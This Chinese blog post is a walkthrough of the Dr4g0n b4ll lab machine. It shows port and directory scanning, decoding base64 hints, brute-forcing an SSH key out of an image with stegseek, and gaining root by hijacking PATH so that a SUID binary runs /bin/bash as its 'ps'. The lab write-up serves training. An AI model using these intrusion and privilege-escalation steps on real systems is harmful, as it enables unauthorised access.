Dr4g0n b4ll靶机

Dr4g0n b4ll靶机

下载地址

扫描发现主机IP 并扫描其端口

发现靶机 IP 为10.4.7.133

nmap -A -p- 10.4.7.133

扫描出开放了 22、80端口

发现相关信息

访问网页
在这里插入图片描述打开网页源码又发现一串 base64 编码

在这里插入图片描述

1. 敏感目录扫描
dirb http://10.4.7.133

发现 robots.txt

进行访问

发现一串 base64 编码

在这里插入图片描述

2.base64 解码

两种方式

(1)网页工具

搜索解码工具即可

在这里插入图片描述找到了一个隐藏目录

在这里插入图片描述

(2)输入命令
echo "eW91lGZpbmQgdGhllGhpZGRlbiBkaXI=" | base64 -d

在这里插入图片描述

DRAGON BALL

👇

这个应该是隐藏目录 进行访问
在这里插入图片描述从这个目录下 发现有一个文件夹 一个 txt文件 一张图片 还有一个登陆界面
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

3. 图片隐写爆破

有一张图片 可能存在图片隐写

将网页图片保存下来

然后输入👇

stegseek aj.jpg top1000.txt

## 工具名称  准备bp的图片名称   密码字典

在这里插入图片描述密码成功爆破 并创建一个文件

在这里插入图片描述该文件为 私钥文件

4. ssh 免密登录

由于在前面发现有一个登陆界面

welcome to xmen

xmen 可能为 用户名

然后输入👇 先给私钥进行赋权 但不能太高

chmod 700 id_rsa

然后进行免密登录

ssh -i id_rsa xmen@10.4.7.133

在这里插入图片描述成功登录

登陆成功查看文件local.txt

在这里插入图片描述成功获取到一个 flag

5. 提权

查看到 script目录的属组属主都为root

在这里插入图片描述
进入目录后发现有一个带有suid的一个可执行文件
尝试查看 并执行

在这里插入图片描述
大致意思就是可以使用root权限执行 ps 的命令

查看到根目录发现只有tmp有写入权

在tmp文件下将"/bin/bash"写入文件ps中,为了使任何目录下都可以执行ps所以将tmp目录添加到环境变量中

cd /tmp                       # 切换到 tmp 目录

echo "/bin/bash" > ps         # 将 /bin/bash 重定向到 ps

chmod 777 ps                  # 给 ps 文件赋予最高权限

cd                            # 切换到 家目录

export PATH=="/tmp:$PATH"     # 将 /tmp 添加到环境变量中

echo $PATH                    # 查看环境变量是否成功添加

在这里插入图片描述全部弄完之后

再去执行 shell

./shell

成功进入 root 用户

切换到 root 家目录 找到最后的 flag

cd /root

cat proof.txt

在这里插入图片描述

总结
  1. base64 解码的两种方式 网页工具 或 命令行
  2. stegseek 工具 图片隐写爆破
  3. ssh 私钥 ssh 免密登录
  4. 添加环境变量的方式(export PATH==“(目录目录名称:)$PATH”)
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值